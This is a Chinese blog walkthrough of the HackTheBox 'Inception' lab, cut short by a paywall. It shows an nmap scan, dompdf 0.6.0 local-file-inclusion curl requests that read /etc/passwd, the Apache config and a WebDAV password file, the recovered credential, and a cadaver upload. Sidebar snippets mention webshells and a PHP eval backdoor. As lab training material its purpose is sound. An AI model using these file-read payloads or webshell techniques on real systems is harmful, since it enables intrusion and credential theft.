hackthebox - inception (考点:dompdf & apache配置& webdav & 3128 proxy &tftp & apt update 提权& ssh-key提权)

最新推荐文章于 2024-06-10 14:14:46 发布
最新推荐文章于 2024-06-10 14:14:46 发布
阅读量1k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/106422792
版权

1 扫描

80进网页信息搜集,
3128是代理访问端口,要想到后面可能要利用这个设置代理,连接靶机不对外的端口等。

Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved

2 http信息搜集

dirbuster扫目录没有价值发现
邮箱那里想burp抓包也发现抓不了,什么鬼
看前端源码ctrl+u,不细看可能还不能发现可以下拉。。拉到最底部,有新目录提示

在这里插入图片描述
在这里插入图片描述
看version版本,搜漏洞

0.6.0

在这里插入图片描述

3 LFI漏洞

根据漏洞提示进行lfi。先试试经典的/etc/passwd

http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd

以及因为我们从nmap里扫出这个http服务器是apache,apache的配置文件lfi读取可以参考这个靶机kioptrix5,里面也给了参考网站查询这里
也就是/etc/apache2/sites-enabled/000-default.conf

但是我一连接,就是下载pdf,然后这个pdf打开后还不能滑动,只能看一部分加密内容。。什么鬼
在这里插入图片描述
所以查看内容,全部改用curl

curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd

curl 10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf

这下就在终端里显示出完整的加密码了,看着就是base,拉去解密,读出,可知有个 cobb用户
在这里插入图片描述
在这里插入图片描述
以及查apache那个,出现了webdav的配置目录和里面的密码。webdav网上科普也有很多,这篇靶机granny也有类似的工具利用
在这里插入图片描述
再继续查。拿到密码。解密

curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd

在这里插入图片描述
在这里插入图片描述

webdav_tester:babygurl69

4 webdav利用

然后参考granny那篇靶机的工具利用,进行put上传。随便put传张图片,可以读取看到,ok

C:\root> cadaver
dav:!> open http://10.10.10.67/webdav_test_inception
Authentication required for webdav test credential on server `10.10.10.67':
Username: webdav_tester
Password: 
dav:/webdav_test_inception/> ls
Listing collection `/webdav_test_inception/': succeeded.
        webdav.passwd                         52  Nov  8  2017
dav:/webdav_test_inception/> put long.jpg
Uploading
最低0.47元/天 解锁文章
冬萍子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
SSH密钥
qq_37407863的博客
07-03 1677
当我们在渗透测试的过程中,拿到一台linux服务器shell,shell的限只是普通账号限的时候,我们可以利用ssh密钥来切换限相同的账号或者root账号。运维人员如果在服务器上使用ssh-keygen生成密钥对(id_rsa、id_rsa.pub),然后采用此密钥对进行远程登录,那么当他忘记把私钥(id_rsa)删除,且文件限可读,黑客就可以使用这个私钥进行用户登录,达到用户水平越或者升到root。使用命令查看系统中存在用户 注:”authorized_keys“文件用来登录的公钥验证
php dompdf 使用
热门推荐
程序员写的技术 FAQ 和杂文
12-17 1万+
新版本DOMPDF安装 版本是6 测试版 DOMPDF下载: https://github.com/dompdf/dompdf php-font-lib下载: https://github.com/PhenX/php-font-lib 1. 新版的DOMPDF似乎默认没有php-font-lib, 下载完之后放到dompdf\lib\php-font-lib目录
Hack The Box(黑客盒子)Preignition篇
最新发布
轻舟已过万重山
06-10 426
我这里没有使用burp suite爆破,直接尝试弱密码,直到admin/admin。-x,--extensions string 要搜索的文件扩展名-定义为PHP。Web、定制应用程序、Apache、侦察、网站结构发现、默认凭证。查看该应用的帮助信息,查找全部参数。根据现有的情报,尝试访问。附上其他可能会用到的参数。,出现访问身份验证入口。
热门开源Dompdf PHP 库中存在严重漏洞
smellycat000的专栏
02-03 885
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士开源的Dompdf PHP库中存在一个高危漏洞 (CVE-2023-23924),如遭利用,可导致攻击者在目标服务器上远程执行代码。开发人员 Bsweeney 在安全公告中指出,“攻击者如果能够向dompdf 供SVG文件,则可能利用该漏洞调用具有任意协议的任意URL。在PHP 8.0.0之前版本中,该漏洞可导致任意反序列化,从而导致任意文件删...
SSH Key的生成和使用
u012898633的博客
09-03 3428
SSH key生成及其使用 一、检查是否已经存在ssh key 二、生成key 三、使用key 四、SSH详解
学习WebDav
janbar的博客
10-12 2079
目录前言初识WebDav有哪些支持webdav的网盘?WebDAV的特性和优势服务端的搭建调用WebDav接口PROPFIND方法PROPPATCH方法MKCOL方法PUT方法GET方法DELETE方法COPY方法MOVE方法LOCK和UNLOCK方法总结前言     在之前一篇文章【keepass+坚果云管理我的密码】中我使用了坚果云的WebDav服务来让我的KeePass实现多平台和设备共享...
inception-v3-cifar10:初始v3数字10
05-01
安装拉Docker镜像$ docker pull tensorflow/tensorflow:1.7.0-py3$ docker run -it --name {docker-name} tensorflow/tensorflow:1.7.0-py3 /bin/bash拉GitHub存储库~# apt-get update~# apt-get install git~# git ...
keras-inception-resnet-v2:使用Keras的Inception-ResNet v2模型(带有重文件)
05-04
keras-inception-resnet-v2 使用Keras的Inception-ResNet v2模型(带有重文件) 在python 3.6下使用tensorflow-gpu==1.15.3和Keras==2.2.5进行了测试(尽管存在很多弃用警告,因为此代码是在TF 1.15之前编写的)...
GoogLeNet-Inception:用于图像分类的GoogLeNet和Inception的TensorFlow实现
02-06
该存储库包含使用预训练模型进行自然图像分类的示例,以及从头开始在数据集上训练Inception网络(测试集的准确度为93.64%)。 可以从 下载CIFAR-10上的预训练模型。 本文的GoogLeNet架构:要求Python 3.3以上实施...
Inception New Tab & Wallpapers Collection-crx插件
03-14
Inception New Tab Extension使您的Chrome浏览器焕然一新。 安装Inception New Tab&Wallpapers Collection,并欣赏Inception的精选高清图像。 它带有一些很酷的属性,这些属性可以改善您的“新标签页”体验,例如:...
webshell b374k.zip
09-19
B374k WebShell的搭建使用,具体使用方法见文章:https://blog.csdn.net/qq_41453285/article/details/101025240
Inception-Module-Tensorflow:Inception模块的Tensorflow实现
05-02
盗版模块的实现 ...Inception Train & Test.ipynb :笔记本,用于培训和测试Inception模块的实现。 layers :包含实现基本层的文件[卷积,最大池化和完全连接] 如果您在查看笔记本文件时遇到问题,请单击。
入坑 Hack The Box
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
WordPress ‘WP ecommerce Shop Styling’插件“dompdf” 远程文件包含漏洞
weixin_30763397的博客
02-18 139
漏洞名称: WordPress ‘WP ecommerce Shop Styling’插件“dompdf” 远程文件包含漏洞 CNNVD编号: CNNVD-201302-129 发布时间: 2013-02-18 更新时间: 2013-02-18 危害等级: 危急 漏洞类型: 威胁类型...
B374K PHP WEBSHELL:一款简单却功能强大的远程管理工具
terry_air的专栏
01-01 2886
B374K PHP WEBSHELL:一款简单却功能强大的远程管理工具 0xroot2015-10-19共103660人围观,发现26个不明物体工具 https://github.com/b374k/b374k 文中及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用! B374K WebShell 是一个非常有用的远程管理工具,管理
渗透测试34---网页后门原理与技术(webshell,weevely ,大马(missile,b374k),菜刀)
初遇我ㄖ寸の热情呢?
04-14 8380
网页后门原理与技术 webshell:就是以代码文件多的形式,存在对方的服务器的某个目录下面 不放后门的话,下次就不方便入侵了 一般厉害的黑客都是自己制造后门程序的。 用途 webshell一般可以:文件管理,搜索文件,扫描端口,执行命令,执行PHP,执行SQL,系统信息 webshell分为3类:一句话木马,小马,大马 一般是:先用一句话木马传小马,小马再去传大马。 搜索webshel...
b374k php webshell
Terry - 专注外贸B2C
01-27 2503
https://github.com/b374k/b374k 一句话后门
一句话***(webshell)是如何执行命令的
weixin_34381687的博客
06-16 1882
      在很多的***过程中,***人员会上传一句话***(简称webshell)到目前web服务目录继而获取系统限,不论asp、php、jsp、aspx都是如此,那么一句话***到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话***。<?php @eval($_POST['cmd']); ?>看到这里不得不赞美前...
DE-GAN升:假象观察者解决潜在不连续性与对比学习新进展
实验结果显示,FakeObserver及其相关的训练技术在少镜头生成和有限数据生成任务上表现卓越,相比于现有DE-GANs,如在多个数据集上的FID分数(Frechet Inception Distance,衡量生成图像与真实数据分布的相似度)上,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值